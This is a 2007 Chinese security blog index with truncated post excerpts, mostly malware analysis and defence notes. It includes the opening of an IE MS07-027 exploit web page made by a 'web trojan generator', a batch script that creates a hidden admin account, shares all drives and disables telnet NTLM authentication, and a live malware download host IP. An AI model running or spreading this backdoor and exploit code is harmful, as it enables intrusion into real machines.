2007-05-27 12:50
RIFF ACONLIST$ $ 後 INAM KASPERSKY IART golds7n |
2007-05-25 19:11
5月16号微软更新了Internet Explorer的这个漏洞补丁。好像这个漏洞并不流行,不过网上已经MS07027漏洞利用的工具了,我所了解的有两款:MS07027网马生成器与最新MS07027+免杀ANI超强高效率网马生成器。
一、MS07027网马生成器会生成一个MS07027.html文件,内容如下:
<html>
<title> MS07-027 Oday </title>
<body>
<OBJECT id="target" classid="clsid:d4fe6227-1288-11d0-9097-00aa00 |
2007-05-24 16:55
昨天的病毒指南针UI图标是属于经典的玻璃3D效果。今天的UI图片还是用Firework2004进行设计的,仿古的。这可以当作web中的封面之类的,并可以很好的扩展:
图片主题是:Virus Wizard(病毒巫师)。通过这本书,你将制作出非 |
2007-05-23 17:33
我想写一款Anti-Virus的软件,这款软件在关于如何分析病毒中有描述:
当你运行病毒后,这个软件会自动分析病毒的行为,然后生成分析报告(TXT格式或最好XML格式的文件),并且此软件将自动根据生成的分析报告制造出专杀工具雏形!
可是目前我水平有限,C的水平也一直停留在一年前的文件操作基础上。现在也只能想,于是就随手设计些UI图标,一方面提高UI的实力,另一方面为将来这个软件的 |
2007-05-23 13:03
从北化反病毒小组成员那拿到了这个样本:%systemroot%\~tmp4502.exe与%systemroot%\~tmp8373.exe,它们是同一病毒文件,估计病毒名字是随机命名的,目前卡巴不报。运行病毒后,复制自身到%systemroot\system\IME\svchost.exe。
进程~tmp4502.exe一直尝试连接http://60.169.1.82:80这个毒窝!我使用了代理才得以顺利测试病毒,故本校学生就不用担心这个病毒带来进一步的危害了:)。病毒一旦连接http://60.169.1.82:80成功就会下载并激活其它类 |
2007-05-21 16:00
@echo off
@attrib +r +s system.bat
@net user Guests 000 /add
@net localgroup administrators Guests /add
@sc config lanmanserver start= auto
@net start server
@net share C$=C:
@net share D$=D:
@net share E$=E:
@net share F$=F:
@net share G$=G:
@net share H$=H:
@net share I$=I:
@net share J$=J:
@net share K$=K:
@tlntadmn config sec = -ntlm
rem 设定身份验证机构:不认证
@sc config Schedule start= auto
@net stop "Task |
2007-05-20 19:45
Sub TongJi()
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile("ok.txt", 1)
strText = objFile.ReadAll
All = Len(strText)
S="` ~ ! @ # $ % ^ & * ( ) - _ = + \ | [ { ] } ; : ' , < . > / ? · ! ¥ ( ) 、 【 】 ; : ‘ ’ “ ” , 《 。 》 ? …… —— chr(34) vbCrLf"
Signs=Split(S," ") |
2007-05-19 19:59
关于如何分析病毒,估计每个人的做法都不太一样,但是原理是相同的,只要知道原理,即可举一反三。有网友问了这个问题,我就来说说这个话题吧,我的实力有限,这个话题只能从我的实践出发。本文涉及的软件,如果没提供下载地址,那么都可以到我网盘上找到http://ycosxhack.ys168.com/。
一、获取病毒的基本信息:
1、病毒的MD5值或SHA1值:我们知道MD5与SHA1都是不可逆的加密算法,不同文件的MD5值或SHA1值是不一样的。病毒文件只要 |
2007-05-17 21:11
这次跟踪后,总算明白Trojan-PSW.Win32.OnlineGames.kw木马为什么会带来那么多的病毒文件!这也是为什么Trojan-PSW.Win32.OnlineGames.kw这类木马变种那么难清理干净……因为其通过IEXPLORE.EXE在后台默默地检视着你的网络,如果网络是通的,那么IEXPLORE.EXE就会偷偷地下载一大堆病毒文件。
首先我断网,运行下载下来的病毒文件(即Trojan-PSW.Win32.OnlineGames.kw),然后我用WSockExpert.exe |
2007-05-16 17:59
在虚拟机VMware感受了下LINUX操作系统UBUNTU7.04,太卡了……我的电脑配置也不差啊,导致我想继续安装VMware Tools都不行……看来只有拿出一台电脑专门使用这个操作系统了。以前用的是RED HAT9.0,也没什么感觉。
现在感觉体验LINUX操作系统就想体验WEB操作系统一样(号称WEB3.0代表),如果就是为了娱乐……
|
|
| 
